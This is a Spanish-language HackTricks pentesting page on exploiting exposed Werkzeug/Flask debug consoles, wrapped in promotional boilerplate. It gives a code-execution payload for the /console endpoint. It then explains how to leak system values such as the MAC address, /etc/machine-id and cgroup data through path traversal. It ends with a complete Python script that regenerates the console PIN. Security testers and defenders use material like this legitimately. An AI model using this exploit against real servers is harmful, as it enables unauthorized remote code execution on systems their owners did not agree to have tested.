10 KiB
Werkzeug / Depuración de Flask
☁️ HackTricks Cloud ☁️ -🐦 Twitter 🐦 - 🎙️ Twitch 🎙️ - 🎥 Youtube 🎥
- ¿Trabajas en una empresa de ciberseguridad? ¿Quieres ver tu empresa anunciada en HackTricks? ¿O quieres tener acceso a la última versión de PEASS o descargar HackTricks en PDF? ¡Consulta los PLANES DE SUSCRIPCIÓN!
- Descubre The PEASS Family, nuestra colección exclusiva de NFTs
- Obtén el swag oficial de PEASS y HackTricks
- Únete al 💬 grupo de Discord o al grupo de Telegram o sígueme en Twitter 🐦@carlospolopm.
- Comparte tus trucos de hacking enviando PRs al repositorio de hacktricks y al repositorio de hacktricks-cloud.
DragonJAR Security Conference es un evento internacional de ciberseguridad con más de una década que se celebrará el 7 y 8 de septiembre de 2023 en Bogotá, Colombia. Es un evento de gran contenido técnico donde se presentan las últimas investigaciones en español que atrae a hackers e investigadores de todo el mundo.
¡Regístrate ahora en el siguiente enlace y no te pierdas esta gran conferencia!:
{% embed url="https://www.dragonjarcon.org" %}
RCE de Consola
Si la depuración está activa, puedes intentar acceder a /console
y obtener RCE.
__import__('os').popen('whoami').read();
También existen varios exploits en internet como este o uno en metasploit.
Protegido con PIN - Traversal de Ruta
En algunas ocasiones, el punto final /console
estará protegido por un PIN. Si tienes una vulnerabilidad de traversal de archivos, puedes filtrar toda la información necesaria para generar ese PIN.
Exploit de PIN de la Consola Werkzeug
Copiado del primer enlace.
Ver el mensaje de "consola bloqueada" de Werkzeug forzando la página de error de depuración en la aplicación.
The console is locked and needs to be unlocked by entering the PIN.
You can find the PIN printed out on the standard output of your
shell that runs the server
Localiza la consola de depuración vulnerable de Werkzeug en la ruta vulnerable-site.com/console
, pero está bloqueada por un número PIN secreto.
Puedes revertir el algoritmo que genera el PIN de la consola. Inspecciona el archivo __init__.py
de depuración de Werkzeug en el servidor, por ejemplo, python3.5/site-packages/werkzeug/debug/__init__.py
. Puedes ver el repositorio de código fuente de Werkzeug para verificar cómo se genera el PIN, pero es mejor filtrar el código fuente a través de una vulnerabilidad de recorrido de archivos ya que es probable que las versiones sean diferentes.
Variables necesarias para explotar el PIN de la consola:
probably_public_bits = [
username,
modname,
getattr(app, '__name__', getattr(app.__class__, '__name__')),
getattr(mod, '__file__', None),
]
private_bits = [
str(uuid.getnode()),
get_machine_id(),
]
probably_public_bits
username
es el usuario que inició este Flaskmodname
es flask.appgetattr(app, '__name__', getattr (app .__ class__, '__name__'))
es Flaskgetattr(mod, '__file__', None)
es la ruta absoluta deapp.py
en el directorio de flask (por ejemplo,/usr/local/lib/python3.5/dist-packages/flask/app.py
). Siapp.py
no funciona, intente conapp.pyc
private_bits
-
uuid.getnode()
es la dirección MAC de la computadora actual,str(uuid.getnode())
es la expresión decimal de la dirección MAC. -
Para encontrar la dirección MAC del servidor, es necesario saber qué interfaz de red se está utilizando para servir la aplicación (por ejemplo,
ens3
). Si es desconocido, filtrar/proc/net/arp
para obtener el ID del dispositivo y luego filtrar la dirección MAC en/sys/class/net/<device id>/address
.
Convertir de dirección hexadecimal a decimal ejecutando en python, por ejemplo:
# Era 56:00:02:7a:23:ac
>>> print(0x5600027a23ac)
94558041547692
get_machine_id()
concatena los valores en/etc/machine-id
o/proc/sys/kernel/random/boot_id
con la primera línea de/proc/self/cgroup
después de la última barra (/
).
Código de get_machine_id()
```python def get_machine_id() -> t.Optional[t.Union[str, bytes]]: global _machine_idif _machine_id is not None: return _machine_id
def _generate() -> t.Optional[t.Union[str, bytes]]: linux = b""
machine-id is stable across boots, boot_id is not.
for filename in "/etc/machine-id", "/proc/sys/kernel/random/boot_id": try: with open(filename, "rb") as f: value = f.readline().strip() except OSError: continue
if value: linux += value break
Containers share the same machine id, add some cgroup
information. This is used outside containers too but should be
relatively stable across boots.
try: with open("/proc/self/cgroup", "rb") as f: linux += f.readline().strip().rpartition(b"/")[2] except OSError: pass
if linux: return linux
On OS X, use ioreg to get the computer's serial number.
try:
</details>
Una vez que todas las variables estén preparadas, ejecuta el script de explotación para generar el PIN de la consola de Werkzeug:
```python
import hashlib
from itertools import chain
probably_public_bits = [
'web3_user',# username
'flask.app',# modname
'Flask',# getattr(app, '__name__', getattr(app.__class__, '__name__'))
'/usr/local/lib/python3.5/dist-packages/flask/app.py' # getattr(mod, '__file__', None),
]
private_bits = [
'279275995014060',# str(uuid.getnode()), /sys/class/net/ens33/address
'd4e6cb65d59544f3331ea0425dc555a1'# get_machine_id(), /etc/machine-id
]
#h = hashlib.md5() # Changed in https://werkzeug.palletsprojects.com/en/2.2.x/changes/#version-2-0-0
h = hashlib.sha1()
for bit in chain(probably_public_bits, private_bits):
if not bit:
continue
if isinstance(bit, str):
bit = bit.encode('utf-8')
h.update(bit)
h.update(b'cookiesalt')
#h.update(b'shittysalt')
cookie_name = '__wzd' + h.hexdigest()[:20]
num = None
if num is None:
h.update(b'pinsalt')
num = ('%09d' % int(h.hexdigest(), 16))[:9]
rv =None
if rv is None:
for group_size in 5, 4, 3:
if len(num) % group_size == 0:
rv = '-'.join(num[x:x + group_size].rjust(group_size, '0')
for x in range(0, len(num), group_size))
break
else:
rv = num
print(rv)
{% hint style="success" %} Si estás utilizando una versión antigua de Werkzeug, intenta cambiar el algoritmo de hash a md5 en lugar de sha1. {% endhint %}
Referencias
DragonJAR Security Conference es un evento internacional de ciberseguridad con más de una década que se celebrará el 7 y 8 de septiembre de 2023 en Bogotá, Colombia. Es un evento de gran contenido técnico donde se presentan las últimas investigaciones en español que atrae a hackers e investigadores de todo el mundo.
¡Regístrate ahora en el siguiente enlace y no te pierdas esta gran conferencia!:
{% embed url="https://www.dragonjarcon.org" %}
☁️ HackTricks Cloud ☁️ -🐦 Twitter 🐦 - 🎙️ Twitch 🎙️ - 🎥 Youtube 🎥
- ¿Trabajas en una empresa de ciberseguridad? ¿Quieres que tu empresa sea anunciada en HackTricks? ¿O quieres tener acceso a la última versión de PEASS o descargar HackTricks en PDF? ¡Consulta los PLANES DE SUSCRIPCIÓN!
- Descubre The PEASS Family, nuestra colección exclusiva de NFTs
- Obtén el merchandising oficial de PEASS y HackTricks
- Únete al 💬 grupo de Discord o al grupo de Telegram o sígueme en Twitter 🐦@carlospolopm.
- Comparte tus trucos de hacking enviando PRs al repositorio de hacktricks y al repositorio de hacktricks-cloud.